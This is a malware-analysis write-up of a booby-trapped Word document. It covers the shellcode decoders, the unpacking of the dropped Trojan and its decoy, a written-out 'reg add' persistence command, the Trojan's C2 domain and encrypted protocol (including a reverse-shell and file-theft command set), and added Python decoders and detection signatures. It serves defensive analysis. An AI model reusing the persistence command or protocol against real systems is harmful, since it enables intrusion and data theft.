National situation.doc Analysis

Today I will analyze the following file:

File Name:  National situation.doc
File Size:  61184 bytes
MD5:        9476ed0a007ba332b7da0a657b1608bd
SHA1:       a7a4802387c2f885a5f0235542c5d3b377335b5b
  • This file was posted at http://contagiodump.blogspot.com and downloaded here.
  • The shellcode begins at file-offset 0x3330.
  • The shellcode starts with a short routine that decodes the rest of the shellcode with a rotate-left-by-4 (nibble swap) on every byte:
00146E44     57                 PUSH EDI
00146E45     5E                 POP ESI
00146E46     90                 NOP
00146E47     33C9               XOR ECX, ECX
00146E49     66:B9 0901         MOV CX, 109
00146E4D     B8 1E000000        MOV EAX, 1E
00146E52     03F0               ADD ESI, EAX
00146E54     8BFE               MOV EDI, ESI
00146E56     8BD6               MOV EDX, ESI
00146E58     AC                 LODS BYTE PTR DS:[ESI]
00146E59     C0C0 04            ROL AL, 4
00146E5C     AA                 STOS BYTE PTR ES:[EDI]
00146E5D     49                 DEC ECX
00146E5E   ^ 75 F8              JNZ SHORT 00146E58
00146E60   - FFE2               JMP EDX
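As an added example (not code from the post), the following Python mirrors the ROL-4 stub so both stages can be decoded offline, and also carries a byte signature for the LODSB / ROL AL,4 / STOSB / DEC ECX / JNZ loop that is identical in the two stubs, which is a cheap way to flag a document carrying this decoder. The stub and body lengths are the constants from the two listings; the sample buffer is constructed here, not taken from the document.

```python
"""ROL-4 (nibble swap) decoder for the two shellcode stages, plus a byte
signature for the decoder loop itself. Added example, not code from the post."""

# Stub length and body length read off the two listings on the page:
# stage 1: ADD ESI, 1E / MOV CX, 109      stage 2: ADD DI, 1A / MOV CX, 4F1
STAGE1_SKIP, STAGE1_COUNT = 0x1E, 0x109
STAGE2_SKIP, STAGE2_COUNT = 0x1A, 0x4F1

# LODSB / ROL AL,4 / STOSB / DEC ECX / JNZ -8: the loop body common to both stubs
ROL4_LOOP_SIG = bytes.fromhex("AC C0C004 AA 49 75F8")


def rol4(byte: int) -> int:
    """ROL AL, 4 on one byte: swap the high and low nibble (self-inverse)."""
    return ((byte << 4) | (byte >> 4)) & 0xFF


def decode_stage(blob: bytes, skip: int, count: int) -> bytes:
    """Leave the first `skip` bytes (the decoder stub) alone and ROL-4 the next
    `count` bytes in place, exactly as the LODSB/ROL/STOSB loop does."""
    if len(blob) < skip + count:
        raise ValueError("blob is shorter than stub + encoded body")
    out = bytearray(blob)
    for i in range(skip, skip + count):
        out[i] = rol4(out[i])
    return bytes(out)


def find_rol4_loops(blob: bytes) -> list:
    """File offsets of every LODSB/ROL AL,4/STOSB/DEC ECX/JNZ loop in a blob;
    useful as a quick triage check on suspect documents."""
    hits, start = [], 0
    while True:
        pos = blob.find(ROL4_LOOP_SIG, start)
        if pos < 0:
            return hits
        hits.append(pos)
        start = pos + 1


def build_sample() -> tuple:
    """Constructed sample: a fake stub of STAGE1_SKIP bytes that ends in the real
    loop bytes, followed by a nibble-swapped body of STAGE1_COUNT bytes.
    Returns (encoded blob, expected decoded blob)."""
    stub = b"\x90" * (STAGE1_SKIP - len(ROL4_LOOP_SIG)) + ROL4_LOOP_SIG
    body = b"constructed second stage ".ljust(STAGE1_COUNT, b"\xCC")
    encoded = stub + bytes(rol4(b) for b in body)   # rol4 is its own inverse
    return encoded, stub + body


if __name__ == "__main__":
    enc, expected = build_sample()
    assert decode_stage(enc, STAGE1_SKIP, STAGE1_COUNT) == expected
    print("decoder loop at offsets:", find_rol4_loops(enc))
```

To use it on the real document, slice the file from offset 0x3330 and call `decode_stage` with the stage-1 constants; the second stage, once read from offset 0x4E00, takes the stage-2 constants.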
  • The decoded shellcode enumerates all open file handles and searches for the one whose file size matches the Word document (0xEF00, i.e. 61,184 bytes).
  • Once it finds the correct file handle, it sets the file pointer to file-offset 0x4E00.
  • It reads 0x7D0 bytes from that point and then executes the data it read (i.e. that data is the second-stage shellcode):
00880000     33C9               XOR ECX, ECX
00880002     66:B9 F104         MOV CX, 4F1
00880006     90                 NOP
00880007     8B7D F8            MOV EDI, DWORD PTR SS:[EBP-8]
0088000A     66:83C7 1A         ADD DI, 1A
0088000E     57                 PUSH EDI
0088000F     8BF7               MOV ESI, EDI
00880011     AC                 LODS BYTE PTR DS:[ESI]
00880012     C0C0 04            ROL AL, 4
00880015     AA                 STOS BYTE PTR ES:[EDI]
00880016     49                 DEC ECX
00880017   ^ 75 F8              JNZ SHORT 00880011
00880019     C3                 RETN
  • Just as before, this shellcode starts by decoding the rest of the shellcode that follows it with a rotate-left-by-4.
  • This decoded shellcode creates a file:
    • C:\DOCUME~1\username\LOCALS~1\Temp\1.tmp
    • It sets the file pointer to file-offset 0x52F1 of the original DOC file and reads 0x3C00 bytes from there.
    • This data is decrypted using a 256-byte key that starts with the low byte of the length of the data, 0x00 (because the length is 0x3C00), and is decremented by one for each following byte.  So we have a 256-byte XOR key 0xFF – 0x00.
  • After these 0x3C00 bytes are decoded in this manner, we end up with something that looks like this:

  • As you can see, we almost have an executable, but more de-obfuscation still has to occur.
  • That final de-obfuscation routine essentially XORs four bytes with 0x77656972 and then skips the next four bytes.  This is equivalent to XOR-ing with an 8-byte key, 0x7765697200000000.
  • The shellcode responsible for this is shown below:
00880153     8B55 EC            MOV EDX, DWORD PTR SS:[EBP-14]
00880156     83C2 08            ADD EDX, 8
00880159     8955 EC            MOV DWORD PTR SS:[EBP-14], EDX
0088015C     8B45 FC            MOV EAX, DWORD PTR SS:[EBP-4]
0088015F     8B4D EC            MOV ECX, DWORD PTR SS:[EBP-14]
00880162     3B48 50            CMP ECX, DWORD PTR DS:[EAX+50]
00880165     7D 17              JGE SHORT 0088017E
00880167     8B55 F8            MOV EDX, DWORD PTR SS:[EBP-8]
0088016A     0355 EC            ADD EDX, DWORD PTR SS:[EBP-14]
0088016D     8B02               MOV EAX, DWORD PTR DS:[EDX]
0088016F     35 72696577        XOR EAX, 77656972
00880174     8B4D F8            MOV ECX, DWORD PTR SS:[EBP-8]
00880177     034D EC            ADD ECX, DWORD PTR SS:[EBP-14]
0088017A     8901               MOV DWORD PTR DS:[ECX], EAX
0088017C   ^ EB D5              JMP SHORT 00880153
  • So, our fully decrypted file has the following characteristics:
File Name:  1.tmp
File Size:  15360 bytes
MD5:        c303e2d790c45bb0e05445120a8af920
SHA1:       cf020c87fb3059a48ae0622960377a0182d588b9
PE Time:    0x4D30024E [Fri Jan 14 07:59:10 2011 UTC]
AV:         14/41 (34.1%) VirusTotal
  • The shellcode then executes 1.tmp.
  • The shellcode then creates the file:
    • C:\DOCUME~1\username\LOCALS~1\Temp\National situation.doc
  • and decrypts the data for this decoy file from the original DOC using the same scheme: a 256-byte key that starts with the low byte of the decoy document's size.
  • This decoy document has the following characteristics:
File Name:  National situation.doc
File Size:  24576 bytes
MD5:        ff737870ded2c680a573143c88d322bd
SHA1:       ee3ec3a8ee1c261a2a3c35b0638b263cae88c79f
  • The shellcode opens the following registry key:
    • Software\Microsoft\Office\11.0\Word\Resiliency
    • and tries to delete “StartupItems”
    • I am not sure what the purpose this serves.  Please let me know if you know.
    • The decoy DOC file is then opened.
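The two decryption passes that turn the embedded blob into 1.tmp, and the single pass that yields the decoy document, are small enough to reimplement for offline extraction. The Python below is an added example, not code from the post: `decrement_key` builds the 256-byte decrementing key from a length, and `xor_dword_skip_dword` mirrors the loop at 0x00880153. Two things the page does not show are treated as assumptions and marked in the code: that the 256-byte key repeats across the blob, and that the loop counter starts at -8 so the first DWORD it touches is at offset 0. The sample blob is constructed here.

```python
"""Two-pass decryption of the blob that becomes 1.tmp and one-pass decryption
of the decoy document. Added example, not code from the post."""
import struct

# Offsets and lengths given on the page
PAYLOAD_OFFSET, PAYLOAD_LEN = 0x52F1, 0x3C00   # 1.tmp ciphertext inside the .doc
DECOY_LEN = 24576                              # size of the decoy document
DWORD_CONST = 0x77656972                       # XOR EAX, 77656972


def decrement_key(length: int) -> bytes:
    """256-byte key: first byte is the low byte of `length`, each following
    byte is the previous one minus one (mod 256)."""
    first = length & 0xFF
    return bytes((first - i) & 0xFF for i in range(256))


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR `data` with `key`. Assumption: the key wraps every 256 bytes; the
    page only states how the key is built, not how it is applied past 256."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def xor_dword_skip_dword(data: bytes, size: int, start: int = -8) -> bytes:
    """Mirror the loop at 0x00880153: offset += 8; stop once offset >= size;
    XOR the DWORD at offset with DWORD_CONST; the following four bytes are
    skipped. Assumption: the counter starts at -8 so the first DWORD touched
    is at 0 (the page does not show the initial value of [EBP-14]); `size`
    stands in for the [EAX+50] field the loop compares against."""
    out = bytearray(data)
    offset = start
    while True:
        offset += 8
        if offset >= size or offset + 4 > len(out):
            break
        (val,) = struct.unpack_from("<I", out, offset)
        struct.pack_into("<I", out, offset, val ^ DWORD_CONST)
    return bytes(out)


def recover_payload(blob: bytes) -> bytes:
    """Pass 1: decrementing 256-byte key. Pass 2: DWORD XOR with a 4-byte gap."""
    pass1 = xor_repeating(blob, decrement_key(len(blob)))
    return xor_dword_skip_dword(pass1, len(pass1))


def recover_decoy(blob: bytes) -> bytes:
    """The decoy only gets the first pass, keyed on its own length."""
    return xor_repeating(blob, decrement_key(len(blob)))


def build_sample_payload() -> tuple:
    """Constructed stand-in for the real blob: a fake PE-looking plaintext
    encrypted with the same two operations (both are self-inverse XORs).
    Returns (ciphertext, plaintext)."""
    plain = (b"MZ" + b"\x00" * 0x3E + b"PE\x00\x00").ljust(PAYLOAD_LEN, b"\xAA")
    cipher = xor_repeating(xor_dword_skip_dword(plain, len(plain)),
                           decrement_key(len(plain)))
    return cipher, plain


if __name__ == "__main__":
    cipher, plain = build_sample_payload()
    assert recover_payload(cipher) == plain
    print("key for 0x3C00 bytes starts:", decrement_key(PAYLOAD_LEN)[:4].hex())
```

Against the real document, `recover_payload(doc[0x52F1:0x52F1 + 0x3C00])` should yield a 15,360-byte PE, which is exactly the stated size of 1.tmp.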

PAYLOAD ANALYSIS – 1.TMP

File Name:  1.tmp
File Size:  15360 bytes
MD5:        c303e2d790c45bb0e05445120a8af920
SHA1:       cf020c87fb3059a48ae0622960377a0182d588b9
PE Time:    0x4D30024E [Fri Jan 14 07:59:10 2011 UTC]
AV:         14/41 (34.1%) VirusTotal
  • When you execute this Trojan, it does the following:
    • Creates the file C:\WINDOWS\ACTIVE.ini and writes 4 bytes to it (0x00000000).
    • It then calls CreateProcessA to launch a second instance of 1.tmp.
    • It tries to delete the following registry key, which does not exist on my system:
      • Software\Microsoft\Active Setup\Installed Components\{A0XC6A98-A14C-J35H-46UD-F5AR862J2AH5}
    • Then this first instance of the Trojan exits.
  • The new instance of the Trojan opens ACTIVE.ini and reads the first 4 bytes (a DWORD).  This DWORD represents an integer.  If the value is 0, the Trojan writes 1 (0x01000000) to the file.  If the value is 1, the Trojan writes 0 back to the file.  This value appears to be used as a flag:
    • If value = 0, start communicating with the C2 node and write 1 back into ACTIVE.ini.
    • If value = 1, start a second instance of 1.tmp, delete the Active Setup component listed above, write 0 back into ACTIVE.ini, and exit.
  • The Trojan then opens the following registry key (the Windows Firewall exception list) and adds 1.tmp to the list:
    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
      • C:\Documents and Settings\username\Local Settings\Temp\1.tmp
  • Starting at file-offset 0x36C8 of 1.tmp there is an encoded string that contains the domain name to be resolved:

  • The Trojan then decodes the highlighted data (blue) above using this simple algorithm:
00402226  |> /8A0C32                   /MOV CL, BYTE PTR DS:[EDX+ESI]
00402229  |. |8AC2                     |MOV AL, DL
0040222B  |. |04 36                    |ADD AL, 36
0040222D  |. |8BFE                     |MOV EDI, ESI
0040222F  |. |32C8                     |XOR CL, AL
00402231  |. |33C0                     |XOR EAX, EAX
00402233  |. |880C32                   |MOV BYTE PTR DS:[EDX+ESI], CL
00402236  |. |83C9 FF                  |OR ECX, FFFFFFFF
00402239  |. |42                       |INC EDX
0040223A  |. |F2:AE                    |REPNE SCAS BYTE PTR ES:[EDI]
0040223C  |. |F7D1                     |NOT ECX
0040223E  |. |49                       |DEC ECX
0040223F  |. |3BD1                     |CMP EDX, ECX
00402241  |.^\72 E3                    \JB SHORT 1.00402226
  • This algorithm XORs each byte of the encoded data with a key byte that starts at 0x36 and is incremented by one for each position (the loop re-measures the string length after every byte, so it stops at the first NUL).
  • The data decodes to: googleupdate2011.dyndns.org.
  • The Trojan then calls ADVAPI32.AllocateAndInitializeSid with sub-authority 544 (0x220 in the listing, i.e. the local Administrators group) as one of the parameters.  This is how the Trojan checks whether it is running with Admin privileges.
00402A59  |.  51                 PUSH ECX                          ; /Arg11
00402A5A  |.  6A 00              PUSH 0                            ; |Arg10 = 00000000
00402A5C  |.  6A 00              PUSH 0                            ; |Arg9 = 00000000
00402A5E  |.  6A 00              PUSH 0                            ; |Arg8 = 00000000
00402A60  |.  6A 00              PUSH 0                            ; |Arg7 = 00000000
00402A62  |.  6A 00              PUSH 0                            ; |Arg6 = 00000000
00402A64  |.  6A 00              PUSH 0                            ; |Arg5 = 00000000
00402A66  |.  68 20020000        PUSH 220                          ; |Arg4 = 00000220
00402A6B  |.  6A 20              PUSH 20                           ; |Arg3 = 00000020
00402A6D  |.  6A 02              PUSH 2                            ; |Arg2 = 00000002
00402A6F  |.  52                 PUSH EDX                          ; |Arg1
00402A70  |.  FF15 20404000      CALL DWORD PTR DS:[<&ADVAPI32.All>; \AllocateAndInitializeSid
  • If the Trojan is running with the credentials of a privileged account, it runs the following command (an Active Setup StubPath entry, i.e. persistence that runs at user logon):
    • cmd /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{A0XC6A98-A14C-J35H-46UD-F5AR862J2AH5}" /v StubPath /t REG_SZ /d "C:\Documents and Settings\username\Local Settings\Temp\1.tmp" /f
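The string decoder at 0x00402226 has one quirk worth reproducing faithfully: after each byte it runs REPNE SCASB over the buffer, so the loop bound is the strlen() of a buffer that is part decoded, part still encoded, and an encoded byte equal to 0x00 cuts the result short. The Python below is an added example, not code from the post; it mirrors that behaviour exactly. The encoded bytes at 0x36C8 are shown on the page only as a screenshot, so the sample here is constructed with the inverse transform and labelled as such.

```python
"""Decoder for the C2 domain obfuscation at 0x00402226 in 1.tmp.
Added example, not code from the post."""

KEY_BASE = 0x36   # ADD AL, 36: key byte for index i is (0x36 + i) & 0xFF


def decode_string(encoded: bytes) -> bytes:
    """Mirror the loop: decode byte i, then re-measure strlen() of the buffer
    (decoded prefix + still-encoded tail) and continue while i < strlen.
    Quirk preserved: an encoded 0x00 anywhere in the tail truncates the result."""
    buf = bytearray(encoded)
    if not buf:
        return b""
    i = 0
    while True:
        buf[i] ^= (KEY_BASE + i) & 0xFF      # XOR CL, AL ; MOV [EDX+ESI], CL
        i += 1                               # INC EDX
        # REPNE SCASB / NOT ECX / DEC ECX == strlen(buffer as it is right now)
        length = buf.index(0) if 0 in buf else len(buf)
        if i >= length:                      # CMP EDX, ECX / JB
            return bytes(buf[:length])


def encode_string(plain: bytes) -> bytes:
    """Inverse transform, used here only to construct sample data."""
    return bytes(b ^ ((KEY_BASE + i) & 0xFF) for i, b in enumerate(plain))


# Constructed with encode_string(); NUL-terminated as the binary's loop expects.
SAMPLE = bytes.fromhex(
    "51 58 57 5e 56 5e 49 4d 5a 5e 34 24 70 73 75 74"
    "68 23 31 27 2e 25 3f 63 21 3d 37 00"
)


if __name__ == "__main__":
    print(decode_string(SAMPLE).decode())    # googleupdate2011.dyndns.org
```

When hunting for the same encoding in other samples, note that a plaintext byte equal to its key byte produces an encoded 0x00, which this decoder (like the original) treats as end of string; `decode_string(encode_string(b"a7") + b"\x00")` therefore returns only `b"a"`.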

COMMUNICATION PROTOCOL

  • This Trojan then connects to googleupdate2011.dyndns.org over TCP port 443 (not SSL) and first performs a simple key exchange with the C2 node:
    • The Trojan first sends 8 bytes of random data to the C2 node.
    • The C2 node replies with 8 bytes of (presumably) random data.
    • These two sets of 8 bytes are XORed with each other to create an 8-byte XOR key that is used to encrypt the data during communication.
    • This key is continually rotated (i.e. its position is not reset to the beginning after each transmission).  If this is confusing, it will make more sense further down.
  • Once the key is exchanged, the Trojan replies with a one-byte transmission (XOR-ed with the first byte of the XOR key).  Once decrypted, this byte has the value 0x01.
  • The C2 node is then expected to send a one-byte command to the Trojan.
  • Valid commands are 0x00 – 0x06; however, the bytes you decrypt on the wire are one higher (0x01 – 0x07), because the Trojan decrements the received byte before evaluating it (ref. 0x00402BC9).  So, to keep things simple, I will refer to each command by the number that appears on the wire.
  • As an example, I will illustrate the key exchange and the processing of the first command, 0x01.
  • The data on the wire looks like this:
Trojan:
00000000  6b ef 40 56 c9 5e c2 5c                          k.@V.^.\ 
C2 node:
00000000  31 31 31 31 31 31 31 0a                          1111111. 
Trojan:
00000008  5b                                               [
C2 Node:
00000008  5b                                               .
Trojan:
00000009  de 72 62 f9 6d f1 56 56  f7 fd b4 18 af 5b 57 3e .rb.m.VV .....[W>
00000019  de b1 90 c7 3c 96 24 2c  b7 12 02 d8 3f 92 35 31 ....<.$, ....?.51
00000029  fe 42 67 8e 06 90 22 33  b3 71 12 8b 0a 81 38 3b .Bg..."3 .q....8;
00000039  b3 14 67                                         ..g
  • KEY EXCHANGE:
    • So, the Trojan started with the following 8 random bytes: 6b ef 40 56 c9 5e c2 5c.
    • I (the C2 node) replied with my own eight bytes: 31 31 31 31 31 31 31 0a.
    • Both sides calculate the 8-byte XOR key: 6b ef 40 56 c9 5e c2 5c XOR 31 31 31 31 31 31 31 0a gives the key 5A DE 71 67 F8 6F F3 56.
  • The Trojan replies with 0x5B (which decrypts to 0x01, because 0x5B XOR 0x5A = 0x01).  This may be the Trojan's way of telling the C2 node that it is ready to receive commands.
  • I sent the 0x01 command (encrypted: 0x5B).
  • The Trojan replies with:
Trojan:
00000009  de 72 62 f9 6d f1 56 56  f7 fd b4 18 af 5b 57 3e .rb.m.VV .....[W>
00000019  de b1 90 c7 3c 96 24 2c  b7 12 02 d8 3f 92 35 31 ....<.$, ....?.51
00000029  fe 42 67 8e 06 90 22 33  b3 71 12 8b 0a 81 38 3b .Bg..."3 .q....8;
00000039  b3 14 67                                         ..g
  • The C2 node will decrypt this data starting with the second byte of the key since the first byte was already used for the command.  So, our key will look like this: DE 71 67 F8 6F F3 56 5A, and repeat for the length of the data.
  • The data that the Trojan sends to the C2 node contains some header data and system information (0xC0A80164 is the IP address of the victim 192.168.1.100).  Here is the decrypted version:
Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   00 03 05 01 02 02 00 0C  29 8C D3 E0 C0 A8 01 64           )ŒÓàÀ¨ d
00000010   00 C0 F7 3F 53 65 72 76  69 63 65 20 50 61 63 6B    À÷?Service Pack
00000020   20 33 00 76 69 63 74 69  6D 00 75 73 65 72 6E 61    3 victim userna
00000030   6D 65 00                                           me 
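The whole exchange above can be replayed offline from the captured bytes. The Python below is an added example, not code from the post: it derives the session key from the two nonces, models the rotating keystream whose position is never reset, decrypts the ready byte, the command and the system-information reply, and pulls out the victim IP (offset 0x0C, as stated above) and the NUL-separated strings. Two assumptions are marked in the code: that each direction of the connection keeps its own keystream position (the capture only decrypts cleanly that way), and that the strings begin at offset 0x14, which is read off the decrypted dump rather than stated on the page.

```python
"""Session key derivation and rotating-XOR stream for the C2 exchange captured
on the page, plus a parser for the decrypted system-information reply.
Added example, not code from the post."""
import socket

# Bytes on the wire, copied from the capture on the page
TROJAN_NONCE = bytes.fromhex("6b ef 40 56 c9 5e c2 5c")
C2_NONCE = bytes.fromhex("31 31 31 31 31 31 31 0a")
TROJAN_READY = bytes.fromhex("5b")
C2_COMMAND = bytes.fromhex("5b")
TROJAN_REPLY = bytes.fromhex(
    "de 72 62 f9 6d f1 56 56 f7 fd b4 18 af 5b 57 3e"
    "de b1 90 c7 3c 96 24 2c b7 12 02 d8 3f 92 35 31"
    "fe 42 67 8e 06 90 22 33 b3 71 12 8b 0a 81 38 3b"
    "b3 14 67"
)


def derive_key(trojan_nonce: bytes, c2_nonce: bytes) -> bytes:
    """8-byte session key = Trojan nonce XOR C2 nonce."""
    return bytes(a ^ b for a, b in zip(trojan_nonce, c2_nonce))


class RotatingXor:
    """XOR keystream whose position carries over between transmissions (the
    key is never restarted). Assumption: each direction keeps its own
    position; that is what makes the captured bytes decrypt cleanly."""

    def __init__(self, key: bytes):
        self.key, self.pos = key, 0

    def apply(self, data: bytes) -> bytes:
        out = bytearray()
        for b in data:
            out.append(b ^ self.key[self.pos % len(self.key)])
            self.pos += 1
        return bytes(out)


def parse_sysinfo(plain: bytes) -> dict:
    """Victim IP is at offset 0x0C (stated on the page). Assumption: the
    NUL-separated strings start at 0x14 (read off the dump). The remaining
    header fields are not identified on the page and are returned raw."""
    return {
        "header": plain[:0x0C].hex(),
        "ip": socket.inet_ntoa(plain[0x0C:0x10]),
        "strings": [s.decode("latin-1") for s in plain[0x14:].split(b"\x00") if s],
    }


def decrypt_session() -> dict:
    """Replay the captured exchange end to end."""
    key = derive_key(TROJAN_NONCE, C2_NONCE)
    from_trojan, from_c2 = RotatingXor(key), RotatingXor(key)
    ready = from_trojan.apply(TROJAN_READY)        # uses key[0] -> 0x01 "ready"
    command = from_c2.apply(C2_COMMAND)            # uses key[0] -> 0x01 sysinfo
    reply = from_trojan.apply(TROJAN_REPLY)        # continues at key[1]
    return {"key": key, "ready": ready, "command": command,
            "reply": reply, "sysinfo": parse_sysinfo(reply)}


if __name__ == "__main__":
    session = decrypt_session()
    print("session key:", session["key"].hex())
    print("sysinfo:", session["sysinfo"])
```

From a detection standpoint the weak spot is the transport: the session runs on TCP/443 but the client's first bytes are an 8-byte nonce rather than a TLS ClientHello, so an 8-byte exchange in each direction followed by single-byte messages on port 443 is a usable network signature for this protocol.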
  • Here is a list of all the commands this Trojan understands and their purpose (again, these numbers are what you would see on the wire after you decrypt the traffic):
    • COMMAND 0x01 – System information
    • COMMAND 0x02 – Close connection/sleep
    • COMMAND 0x03 – Restart the connection
    • COMMAND 0x04 – Execute the file microupdater.exe (same location as 1.tmp)
    • COMMAND 0x05 – Exit
    • COMMAND 0x06 – Reverse shell (cmd.exe is copied to C:\WINDOWS\alg.exe and executed)
    • COMMAND 0x07 – File system transactions
      • The Trojan creates a second connection to the C2 node and accepts the following commands over this new connection:
        • 0x01 – Directory listing
        • 0x02 – File move
        • 0x03 – File download (to victim)
        • 0x04 – File upload (to C2 node)
        • 0x05 – Execute a file
        • 0x06 – Delete a file
COMMENTS

  1. Fifth.Sentinel (04-12-11)

     > The shellcode opens the following registry key:
     > Software\Microsoft\Office\11.0\Word\Resiliency
     > and tries to delete “StartupItems”
     > I am not sure what the purpose this serves. Please let me know if you know.
     > The decoy DOC file is then opened.

     I was looking at this and why, when you search for Resiliency\StartupItems, you get so many malware detection webpages. I think I now have a theory.

     Office uses the StartupItems key to hard disable add-ins and can cause the office application with that key to start in safe mode. So if the exploit is using an Office app as the vector, and the exploit crashes the office app on execution, then the theory would be a StartUpItems key is automatically created by Office. So if the attacker wants to open the decoy document without engaging safe-mode they need to delete the StartUpItems entries.

     Just a working theory so far, since there is little information on this key around.

     Fifth.Sentinel

     • shpata (04-12-11)

       Thank you for looking into this and for your feedback.
